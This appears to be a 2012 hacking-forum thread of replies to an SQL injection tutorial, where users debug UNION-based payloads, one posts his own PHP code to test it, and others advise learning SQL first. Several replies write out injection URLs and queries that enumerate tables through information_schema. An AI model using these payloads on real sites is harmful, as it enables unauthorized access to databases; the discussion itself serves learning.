Author Topic: SQL Injection (Read 12719 times)

Factionwars · « **Reply #15 on:** February 05, 2012, 08:49:08 PM »

l33tas did you try to break the first SELECT statement by throwing a -1 instead of a 1 so for example

: SELECT * FROM `table_test` WHERE straipsnio_id = '-1' UNION ALL SELECT 1,2,3,concat(table_name) FROM `information_schema.TABLES` WHERE table_schema=database(),5,6,7,8,9,10

l33tas · « **Reply #16 on:** February 06, 2012, 02:19:55 PM »

I get error: #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5,6,7,8,9,10 LIMIT 0, 30' at line 1
mb my MySQL db dont understand concat( table_name )? or all db must execute this function?
But if I try SELECT concat(table_name) FROM `tables` WHERE table_schema='test_table' its works fine..

Kulverstukas · « **Reply #17 on:** February 11, 2012, 09:08:26 AM »

Videos are shit. You do not learn SQL injection without knowing SQL... this way you can learn few commands and that's it! Only if you know SQL you can make queries and inject them... ugh.

Learn SQL and ONLY THEN learn how to inject!

ande · « **Reply #18 on:** February 11, 2012, 05:25:31 PM »

Quote from: l33tas on February 05, 2012, 08:12:58 PM

I try this tutorial.. and have problem.
First: when you try write http://evilzone.org/index.php?id=17+ORDER+BY+5 or http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,3 you get nothing.. I solved this problem with ...?id=17' UNION ALL SELECT 1,2,3# but if you write in url in my case # dont works so I change it to %23. like ?id=17' UNION ALL SELECT 1,2,3%23.
Second: when I try this ?id=17+UNION+ALL+SELECT+1,2,concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=database() its dont work.. I try in MySQL and its gives this error: #1109 - Unknown table 'table_test' in information_schema
in my case Sql query is : SELECT * FROM `table_test` WHERE straipsnio_id = '1' UNION ALL SELECT 1,2,3,concat(table_name) FROM `information_schema.TABLES` WHERE table_schema=database(),5,6,7,8,9,10
any solution?

Your SQL query is invalid:

Code: [Select]

SELECT * FROM `table_test` WHERE straipsnio_id = '1' UNION ALL SELECT 1,2,3,concat(table_name) FROM `information_schema.TABLES` WHERE table_schema=database(),5,6,7,8,9,10

That is not a valid SQL query. I think you mean:

Code: [Select]

SELECT * FROM `table_test` WHERE straipsnio_id = '1' UNION ALL SELECT 1,2,3,concat(table_name),5,6,7,8,9,10 FROM `information_schema.TABLES` WHERE table_schema=database()

D4rk0rD · « **Reply #19 on:** March 27, 2012, 02:57:05 PM »

Interesting article , Best way to master SQL injection is learning sql first and study whats happen behind the scene when we injecting .

you can download a SQL manual on MySql site , Thats good manual to familiar with SQL .

Factionwars · « **Reply #20 on:** March 27, 2012, 03:01:23 PM »

Quote from: D4rk0rD on March 27, 2012, 02:57:05 PM

Interesting article , Best way to master SQL injection is learning sql first and study whats happen behind the scene when we injecting .

you can download a SQL manual on MySql site , Thats good manual to familiar with SQL .

Also the way php/asp/python etc. Vreates and executes the querys

dataspy · « **Reply #21 on:** March 27, 2012, 08:42:28 PM »

Awesome tutorial, thanks!!!!

I have to mess with this more, I was already doing all the preventive measures recommended in this tutorial but even when I take prevntive measures away I still can't break my code, I'm gonna have to do a lot more studying!!!

example of some code I was trying to break (my dad owns a limousine company, I wrote this for him to keep track of maintenance on the vehicles)

SearchRecords2.php (redirects to VewRecords.php below)

Code: [Select]

<a href=\"ViewRecord.php?MaintenanceRecordID=$Row[MaintenanceRecordID]\" target=\"_blank\">View</a>

ViewRecords.php

Code: [Select]

// assign vars
$MaintenanceRecordID = mysqli_real_escape_string($Con, trim($_GET['MaintenanceRecordID']));

if((!empty($MaintenanceRecordID)) && (is_numeric($MaintenanceRecordID)))
{
    // query to database
    $Query = "SELECT
        MaintenanceRecords.MaintenanceRecordID,
        MaintenanceRecords.MaintenanceRecordDate,
        MaintenanceRecords.MaintenanceRecordNotes,
        Vehicles.VehicleNumber,
        MaintenanceJobs.MaintenanceJob
        FROM MaintenanceRecords
        LEFT JOIN Vehicles ON Vehicles.VehicleID = MaintenanceRecords.VehicleID
        LEFT JOIN MaintenanceJobs ON MaintenanceJobs.MaintenanceJobID = MaintenanceRecords.MaintenanceJobID
        WHERE MaintenanceRecords.MaintenanceRecordID = '$MaintenanceRecordID'";
        
    // result from $query
    $Result = mysqli_query($Con, $Query) or die(mysqli_error($Con));

when I took away mysqli_real_escape_string, is_numeric, and the '' for the var, I still couldn't inject

oh well something to play with later

D4rk0rD · « **Reply #22 on:** March 30, 2012, 05:29:40 PM »

Get sql manuals from this link :

http://dev.mysql.com/doc/refman/5.5/en/

This is english manuals you can download from other languages also . just check around site

.

ande · « **Reply #23 on:** March 30, 2012, 09:56:16 PM »

Quote from: D4rk0rD on March 27, 2012, 02:57:05 PM

Interesting article , Best way to master SQL injection is learning sql first and study whats happen behind the scene when we injecting .

you can download a SQL manual on MySql site , Thats good manual to familiar with SQL .

I disagree, learning PHP alongside SQL(MySQL) is the best way. Then study the concept(s) of SQL injection vulnerabilities.

Quote from: dataspy on March 27, 2012, 08:42:28 PM

Awesome tutorial, thanks!!!!

I have to mess with this more, I was already doing all the preventive measures recommended in this tutorial but even when I take prevntive measures away I still can't break my code, I'm gonna have to do a lot more studying!!!

example of some code I was trying to break (my dad owns a limousine company, I wrote this for him to keep track of maintenance on the vehicles)

SearchRecords2.php (redirects to VewRecords.php below)
Code: [Select]
<a href=\"ViewRecord.php?MaintenanceRecordID=$Row[MaintenanceRecordID]\" target=\"_blank\">View</a>
ViewRecords.php
Code: [Select]
// assign vars $MaintenanceRecordID = mysqli_real_escape_string($Con, trim($_GET['MaintenanceRecordID'])); if((!empty($MaintenanceRecordID)) && (is_numeric($MaintenanceRecordID))) { // query to database $Query = "SELECT MaintenanceRecords.MaintenanceRecordID, MaintenanceRecords.MaintenanceRecordDate, MaintenanceRecords.MaintenanceRecordNotes, Vehicles.VehicleNumber, MaintenanceJobs.MaintenanceJob FROM MaintenanceRecords LEFT JOIN Vehicles ON Vehicles.VehicleID = MaintenanceRecords.VehicleID LEFT JOIN MaintenanceJobs ON MaintenanceJobs.MaintenanceJobID = MaintenanceRecords.MaintenanceJobID WHERE MaintenanceRecords.MaintenanceRecordID = '$MaintenanceRecordID'"; // result from $query $Result = mysqli_query($Con, $Query) or die(mysqli_error($Con));
when I took away mysqli_real_escape_string, is_numeric, and the '' for the var, I still couldn't inject

oh well something to play with later

Your code cant be injected to do any harm because the PHP script checks if the MaintenanceRecordID is numeric or not. However you can do things like MaintenanceRecordID=123e31 and you will most likely get a overflow problem, but it wont cause more than an error message.

Quote from: D4rk0rD on March 30, 2012, 05:29:40 PM

Get sql manuals from this link :

http://dev.mysql.com/doc/refman/5.5/en/

This is english manuals you can download from other languages also . just check around site .

Not sure how this will help must people..

Droaxenius · « **Reply #24 on:** April 10, 2012, 12:49:21 PM »

Again and awesome tutorial ande.

Keep up the quality!

News:

Author Topic: SQL Injection (Read 12719 times)

Factionwars

Re: SQL Injection

l33tas

Re: SQL Injection

Kulverstukas

Re: SQL Injection

ande

Re: SQL Injection

D4rk0rD

Re: SQL Injection

Factionwars

Re: SQL Injection

dataspy

Re: SQL Injection

D4rk0rD

Re: SQL Injection

ande

Re: SQL Injection

Droaxenius

Re: SQL Injection